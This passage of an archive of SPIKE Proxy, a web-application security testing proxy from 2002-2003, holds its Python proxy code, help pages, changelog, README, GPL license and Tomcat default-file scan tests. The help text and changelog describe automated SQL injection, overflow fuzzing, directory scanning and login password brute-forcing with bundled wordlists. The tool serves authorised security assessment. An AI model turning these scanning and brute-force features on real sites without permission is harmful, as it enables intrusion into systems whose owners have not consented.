returncode of 304,302,301 reported " print "\nResponse Header:\n"+"".join(serverheader.data) serverbody=body() if bodylength>0 or readtillclosed or serverheader.wasChunked: if debug_spkproxy: print "Reading a body of length "+str(bodylength)+" readtillclosed="+str(readtillclosed)+" chunked="+str(serverheader.wasChunked) serverbody.read(self.currentSocket,bodylength,serverheader.wasChunked,readtillclosed) if debug_spkproxy: print "Body turned out to be "+str(serverbody.mysize)+" or "+str(len(serverbody.data))+" bytes." self.massageResponse(serverheader,serverbody) response=self.constructResponse(serverheader,serverbody) if (readtillclosed): if debug_spkproxy: print "Saw Connection Close setting to 1" self.closeServerSocket() self.sawConnectionClose=1 if newserverheader!=None: newserverheader=serverheader if newserverbody!=None: newserverbody=serverbody return (response,serverheader,serverbody) def cleanup(self): #needs to close socket and stuff self.connection.close() if self.haveSocket: self.currentSocket.close() self.haveSocket=0 #print "CLEANING UP" #time.sleep(4) return class spkProxy: def __init__(self): self.mylistenport=8080 self.mylistenhost='' self.myUI=spikeProxyUI.spkProxyUI() #here we set ourselves as the parent to the UI self.myUI.setParent(self) self.proxyHost="" self.proxyPort=0 self.SSLProxyHost="" self.SSLProxyPort=0 self.NTLMUser="" self.NTLMDomain="" self.NTLMPassword="" def setPort(self,port): self.mylistenport=int(port) return def setListenHost(self,host): self.mylistenhost=host return def setProxyHost(self,host): self.proxyHost=host def setProxyPort(self,port): self.proxyPort=port def setSSLProxyHost(self,host): self.SSLProxyHost=host def setSSLProxyPort(self,port): self.SSLProxyPort=port def setNTLMUser(self, user): self.NTLMUser=user def setNTLMDomain(self, domain): self.NTLMDomain=domain def setNTLMPassword(self, passwd): self.NTLMPassword=passwd def set404List(self,a404list): default404stringlist=a404list return def addTo404List(self,newstring): default404stringlist.append(newstring) return def removeFrom404List(self,oldstring): if oldstring in default404stringlist: default404stringlist.remove(oldstring) return def get404List(self): return default404stringlist def run(self): self.myUI.setNTLM((self.NTLMUser,self.NTLMPassword,self.NTLMDomain)) self.myUI.setProxy((self.proxyHost,self.proxyPort,self.SSLProxyHost,self.SSLProxyPort)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) s.bind((self.mylistenhost, self.mylistenport)) s.listen(5) while 1: s.set_timeout(None) conn, addr = s.accept() s.set_timeout(10) print 'Connected to by', addr connection=MyConnection(conn) self.handleConnection(connection) def handleConnection(self,connection): #this needs to spawn a new thread!! connection=spkProxyConnection(connection,self.myUI,proxy=(self.proxyHost,self.proxyPort,self.SSLProxyHost,self.SSLProxyPort),ntlm=(self.NTLMUser,self.NTLMPassword,self.NTLMDomain)) connection.start() #done. :> #end of class spkProxy def usage(): print """ SPIKE Proxy Version "+VERSION+", Immunity, Inc. http://www.immunitysec.com/spike.html for more help and information usage: spkproxy.py [-p port] [-h proxyHost -H proxyPort] [-s proxySSLHost -S proxySSLPort] [-U NTLM Username -P NTLM Password -D NTLM Domain] [-l listenhost] """ #this stuff happens. if __name__ == '__main__': print "Running SPIKE Proxy v "+VERSION print "SPIKE Proxy is copyright Dave Aitel 2002" print "License: GPL v 2.0" print "Please visit www.immunitysec.com for updates and other useful tools!" print "*** To use the GUI, browse to http://spike/ ***" print "Let dave@immunitysec.com know if you like this project. :>" #VERSIONCHECK #just comment this out if it pisses you off versioncheck.getversion(VERSION) #quit on control C and control break (win32) import signal signal.signal(signal.SIGINT,sys.exit) app = spkProxy() try: (opts,args)=getopt.getopt(sys.argv[1:],"h:H:p:s:S:U:P:D:l:") except getopt.GetoptError: #print help usage() sys.exit(2) for o,a in opts: if o in ["-s"]: app.setSSLProxyHost(a) if o in ["-S"]: app.setSSLProxyPort(a) if o in ["-h"]: app.setProxyHost(a) if o in ["-H"]: app.setProxyPort(a) if o in ["-p"]: app.setPort(int(a)) if o in ["-U"]: app.setNTLMUser(a) if o in ["-D"]: app.setNTLMDomain(a) if o in ["-P"]: app.setNTLMPassword(a) if o in ["-l"]: app.setListenHost(a) app.run() spkproxy/help.html0100664000076500007650000000343107555550270013243 0ustar davedave help

    Help and Other Information

    This is basically a nice little interface into SPIKE Proxy 1.1. To use it, you eithar click through the heirarchy of the requests (located to the right of the main window) or you click on request cache. You will see something like this:
    POST3592989045638HTTPA1.12001870221480374626616159141244082612_loginnet.passport.com
    Print Request Info, rewrite request, Display Response, crawl, argscan, dirscan, overflow

    That is a "request" (a POST to passport.com, in fact) which you can then resubmit. If you make multiple unique requests to a particular URL, they will each be stored . Requests that are exactly alike are discarded.

    If you want to resubmit this request, click on "rewrite request".

    If you just want to see information about this request, click "print request info". Simple, eh?

    Clicking Display Reponse will show you what the server responded with. Clicking "crawl" will currently display a "Not Implemented" error message. Clicking argscan or overflow will attempt to SQL inject or overflow any arguments SPIKE Proxy recognized. If it detects any interesting error messages, that request will be saved off and logged.

    One fun thing to do is browse your entire site, then go to the top level and click "argscan" which will then recurse through your entire site and look for ODBC errors. Fun, huh?

    If you have any other questions, e-mail the author at dave@immunitysec.com spkproxy/index.html0100664000076500007650000000103207555550270013415 0ustar davedave index spkproxy/left.html0100664000076500007650000000114407555550270013244 0ustar davedave left

    UI Options

    request cache

    Help

    Stop All Actions

    Allow actions again.

    Configure SPIKE Proxy spkproxy/notes.html0100664000076500007650000000000107555550270013431 0ustar davedave spkproxy/requestcache.html0100664000076500007650000000046107555550270014767 0ustar davedave requestcache

    Request Cache

    ***requestcache*** spkproxy/titleframe.html0100664000076500007650000000057407616205006014444 0ustar davedave SPIKE Proxy UI

    SPIKE Proxy Version 1.4.7 - Immunity, Inc.

    spkproxy/spikeProxyUI/0040775000076500007650000000000007670116354014041 5ustar davedavespkproxy/topright.html0100664000076500007650000000044107555550270014151 0ustar davedave topright ***SITES*** spkproxy/cleanup.bat0100664000076500007650000000010107555550314013532 0ustar davedaverem for MS-DOS and compatible cd spkproxy del /S /Q spikeProxyUI spkproxy/runme.bat0100664000076500007650000000024407555550314013241 0ustar davedaverem Runme.bat for SPIKE Proxy 1.4 PATH=C:\SPIKEProxy\Python22;c:\SPIKEProxy\openssl\out32dll;%PATH% echo "Running Win32 SPIKE Proxy" cd spkproxy python spkproxy.pyspkproxy/cleanup.sh0100775000076500007650000000006007555550316013407 0ustar davedaverm -rf spikeProxyUI rm -f *~ mkdir spikeProxyUI spkproxy/CHANGELOG.txt0100664000076500007650000001407607667727676013510 0ustar davedave1.4.8 June 5, 2003 Major UI improvements, added a normalizer so URLs don't push behind the spikeProxyUI directory. Cache is much nicer - disregards images. Fixed that annoying ../../ bug. read_query.py added. Useful for printing out saved requests from the command line without loading the entire UI. Various core engine fixes 1.4.7 January 26, 2003 Fixed the engine so it worked on a few more sites...cruel.com and xgoogle.com in particular. Also fixed the rewrite request support so it sent its data as a POST instead of a GET since people were complaining that IE didn't let them use long GETs. Added support for restricted pages and hosts. Please let me know if you have a public page this doesn't work with. A known bug is that crawling urls with ../ in them will do very bad things. To be fixed in upcoming versions. Send me a patch! :> 1.4.6 Nov 18, 2002 o Fixed NTLM support for some people (thanks to cc_@hushmail.com). Removed print statement with the password from the log screen. o Added "False 404 Detection" which can be customized through the Configuration menu. Any request that comes in with a string specified as a "False 404" string will be transformed internally to a 404 so the automatic routines won't false positive on that misconfigured server. o Fixed a bug in the VulnXML from whisker database script. o Added WHYGPL.txt 1.4.5 Nov 7, 2002 Added NTLM support. See the Usage statement for how to use it. It should be otherwise transparent. It was tested on IIS 5.0, so your milage may vary. Example: ./spkproxy.py -U Administrator -P jbone -D localhost will automatically log in as Administrator with the password of jbone and the domain of localhost wherever presented with an NTLM challenge. This works even during scans, although scans will now take 3 times as long. Added "ordering" to arguments, since that was causing some problems with some applications. Added Frostman's SPIKE Proxy Usage document to directory. Fixed other associated bugs, some of which were quite bad, so do upgrade. Added Auto-Version-Check. You can disable this in spkproxy.py if it bugs you. 1.4.3 Oct 23, 2002 o Win32 now supported (really really long URLS may break due to Win32 directory length restrictions) o fr0stman added many changes to logging and additional bugfixes that made various subsystems actually work including manual rewriting, and password and injection scanning. Note: To do password scanning, it is best to go into the configuration menu, and then remove everything from Success List, unless you know explicitly what the server will say on success. Then add something from the failure page into the failure list, add a list of words to the passwordlist, and then start your scan. o VulnXML added o Now has Nikto/Whisker functionality o script to convert from Nikto database to VulnXML added o Directory, File, and Site scanning is supported and tested. o IIS ASP Chunked overflow is properly detected o Variable scanning is theoretically there, but not tested o Any successful vulnerability check is saved off for review 1.3 Sep 26, 2002 Crawling o added form parser o added rawparser for when SGML parser fails o caught SGML parser failing exception nicely o removed If- headers when crawling o revitalized core logic to work better against various test pages o don't forget that crawling MUST start from a page - so to initiate it go to a page and then you'll see the crawl option Core engine o handles chunked responses much better o handles all responses better in general - many fixes to spkproxy.py If a page doesn't work now, I'd like to know about it o Fixed servers that close sockets even if I have keep-alive on o added deletion of headers to header API UI o Added stop-all-actions and start-actions to enable a user to stop a runaway argscan or dirscan or overflow or crawl To use this, just click on stop while the action is happening, and then later click on start again to enable automatic functionality o Added dirscan - to use this go to the root of where you want to start your scan o file extention scan looks for file.bak, file~, etc o directory scan looks for common directories. I have a long list in words, and if this is too long for you, replace words with shortwords and retry your dirscan o Added time to logging information, and extended logging information fields to 1500. o Slowed log page refresh to 25 seconds (you can always click refresh to get it immediately) 1.2 Sep 4, 2002 Crawling support added (click crawl on any page to crawl from that page) o if the SGML parser gives you an exception, that means that for some reason it can't handle that kind of file. Add that extention to the invalidHTMLExtentions array at the very top of spikeUI o the SPIKE Proxy crawler will NOT crawl past the site you are doing, and will not crawl from http to https or vice versa. If you want to do this, you have to go to a page on the https site and start a crawl from there o There is still no way to STOP a crawl other than Control-C or killall /usr/bin/python (more effective) o The crawler doesn't go downloading every jpg,png and .tgz file it finds. In fact, it ignores them. Download those files manually if you like. ./cleanup.sh added to erase your saved pages tree. POST fuzzing fixed 1.1: July 22 Finished SPIKE Proxy UI Features: o argscan (ODBC error finder) o rewrite requests o fun 1.0: o first release to public Features: Fully threaded model Supports Connection: keep-alive Fast, efficient transfer Supports Chunked Encoding Supports Connection: close Supports changing User-Agent to IE 5.0 (default) Supports bizzare arguments (like ebay uses) Supports SSL (uses pyOpenSSL version 5.0pre or greater) Can log into Hotmail, unlike other proxies I've tried Non-Features: No user interface beyond printing out queries at the moment Use SPIKE v2.4 or > to create fuzz scripts, if such is your wont. This will be fixed in future releases. spkproxy/LICENSE.txt0100644000076500007650000003560607555550323013256 0ustar davedave GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS spkproxy/README.txt0100664000076500007650000000232307555550323013121 0ustar davedaveHome for the SPIKE Proxy. Author: Dave Aitel (dave@immunitysec.com) Webpage: www.immunitysec.com/spike.html Version: 1.4.2 See CHANGES.txt for the changelog. All Users: Note: VulnXML is not finished. It does not work. Everything else should work though. allwords and shortwords are useful for your login form password bruteforcing needs! Win32 users: runme.bat uses some default configuration options. If you did not unpack SPIKE Proxy into c:\SPIKEProxy then they may be off by a bit. You can feel free to manual edit them to change to where you actually did put them. Type runme.bat to start up the proxy, then go into explorer: tools->Internet Options->Connections->LAN Settings Click, "Usge a proxy server" set the fields to say 127.0.0.1 and 8080 Click OK Now go into explorer and browse to http://spike/ You will have to manually refresh that top level URL to reload the contents of the right hand side. To kill SPIKE Proxy, pull up the task manager and kill the python process. I know of no other way. To Use: python spkproxy.py [ optional port argument, 8080 is default ] Then set up your browser to use that port for both HTTP and HTTPS proxies. Then watch the traffic go! Browse to http://spike/ to use the UI! spkproxy/TODO.txt0100664000076500007650000000102507566206215012727 0ustar davedaveTodo file: Bugs: 1. VulnXML parsing bug (<>) Fixed bug in xmlescape() which was double encoding by encoding < and then encoding the resulting & with & 2. multi-register of 403's in standard directoryscan Need to unhook 403's and rehook the cgi-directory scanning in special site scans Not done yet! 3. False 404's that masquarade as 200 Fixed! 4. Need to change VulnXML.py to reflect that Match can also have the type "exact" Not done Yet! Requested Features: 1. Achilles like grab of POSTS and such spkproxy/testform.py0100775000076500007650000000325107555550352013646 0ustar davedave#!/usr/bin/python form="""
    SEARCH CNN.COM:
    SEARCH CNN.COM:
    """ import daveutil print daveutil.daveFormParse(form) spkproxy/testpickle.py0100775000076500007650000000107707555550363014160 0ustar davedave#!/usr/bin/python #testpickle.py - tests the pickle routines for a RequestAndResponse #global imports import os import dircache import pickle #my imports from spkproxy import header,body from requestandresponse import RequestAndResponse import daveutil clientheader=header() clientbody=body() serverheader=header() serverbody=body() filename="testpickle.pickle" obj=RequestAndResponse(clientheader,clientbody,serverheader,serverbody) openfile=open(filename,"w") print "openfile="+str(openfile)+" object: "+str(obj) pickle.dump(obj,openfile) openfile.close() print "Done!" spkproxy/FileTemplate.xml0100664000076500007650000000305007555575464014533 0ustar davedave (FILENAME) DESCRIPTION 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET PATHFILENAME HTTP/1.0 RESPONSE TESTCRITERIA spkproxy/VulnXML/0040775000076500007650000000000007555347427012744 5ustar davedavespkproxy/VulnXML/SiteTests/0040775000076500007650000000000007670116363014662 5ustar davedavespkproxy/VulnXML/SiteTests/sitetest-100.xml0100664000076500007650000000722407566204543017552 0ustar davedave (buffer2.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/buffer2.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-101.xml0100664000076500007650000000722407566204543017553 0ustar davedave (buffer3.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/buffer3.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-102.xml0100664000076500007650000000722407566204543017554 0ustar davedave (buffer4.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/buffer4.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-103.xml0100664000076500007650000000722607566204543017557 0ustar davedave (extends1.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/extends1.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-104.xml0100664000076500007650000000722607566204543017560 0ustar davedave (extends2.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/extends2.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-105.xml0100664000076500007650000000722607566204543017561 0ustar davedave (Language.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/Language.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-106.xml0100664000076500007650000000724007566204543017556 0ustar davedave (pageAutoFlush.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageAutoFlush.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-107.xml0100664000076500007650000000723207566204543017560 0ustar davedave (pageDouble.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageDouble.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-108.xml0100664000076500007650000000723407566204543017563 0ustar davedave (pageExtends.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/pageExtends.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-109.xml0100664000076500007650000000723407566204543017564 0ustar davedave (pageImport2.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory 